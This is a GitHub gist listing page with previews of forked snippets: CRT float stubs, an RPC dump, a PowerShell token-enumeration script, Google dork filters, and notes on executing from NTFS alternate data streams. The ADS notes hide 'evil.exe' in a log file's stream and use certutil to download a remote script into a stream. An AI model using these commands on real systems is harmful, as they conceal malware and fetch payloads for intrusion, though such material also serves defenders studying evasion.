Skip to content

Instantly share code, notes, and snippets.

View unclenull's full-sized avatar

unclenull

2 followers · 3 following
View GitHub Profile
@unclenull
unclenull / win32_crt_float.cpp
Created February 16, 2024 14:24 — forked from mmozeiko/win32_crt_float.cpp
Visual C/C++ CRT functionality
extern "C"
{
int _fltused;
#ifdef _M_IX86 // following functions are needed only for 32-bit architecture
__declspec(naked) void _ftol2()
{
__asm
{
@unclenull
unclenull / rpc_dump_rs5.txt
Created August 17, 2023 14:32 — forked from masthoon/rpc_dump_rs5.txt
RPC interfaces RS5
--------------------------------------------------------------------------------
<WinProcess "smss.exe" pid 368 at 0x5306908L>
64
[!!] Invalid rpcrt4 base: 0x0 vs 0x7ffec24f0000
--------------------------------------------------------------------------------
<WinProcess "csrss.exe" pid 472 at 0x5306e48L>
64
Interfaces :
Endpoints :
@unclenull
unclenull / Get-Token.ps1
Created May 18, 2023 07:50 — forked from vector-sec/Get-Token.ps1
PowerShell script to enumerate all Process and Thread tokens.
function Get-Token
{
foreach($proc in (Get-Process))
{
if($proc.Id -ne 0 -and $proc.Id -ne 4)
{
try
{
$hProcess = OpenProcess -ProcessId $proc.Id -DesiredAccess PROCESS_QUERY_LIMITED_INFORMATION
}
@unclenull
unclenull / NTFS_ADS_Methods.md
Last active January 8, 2023 02:46 — forked from api0cradle/Exe_ADS_Methods.md
Execute from Alternate Streams

Add content to ADS

type C:\temp\evil.exe > "C:\Program Files (x86)\TeamViewer\TeamViewer12_Logfile.log:evil.exe"

extrac32 C:\ADS\procexp.cab c:\ADS\file.txt:procexp.exe

findstr /V /L W3AllLov3DonaldTrump c:\ADS\procexp.exe > c:\ADS\file.txt:procexp.exe

certutil.exe -urlcache -split -f https://raw.githubusercontent.com/Moriarty2016/git/master/test.ps1 c:\temp:ttt

makecab c:\ADS\autoruns.exe c:\ADS\cabtest.txt:autoruns.cab

@unclenull
unclenull / GoogleDorking.md
Created April 19, 2022 11:10 — forked from sundowndev/GoogleDorking.md
Google dork cheatsheet

Google dork cheatsheet

Search filters

Filter Description Example
allintext Searches for occurrences of all the keywords given. allintext:"keyword"
intext Searches for the occurrences of keywords all at once or one at a time. intext:"keyword"
inurl Searches for a URL matching one of the keywords. inurl:"keyword"
allinurl Searches for a URL matching all the keywords in the query. allinurl:"keyword"
intitle Searches for occurrences of keywords in title all or one. intitle:"keyword"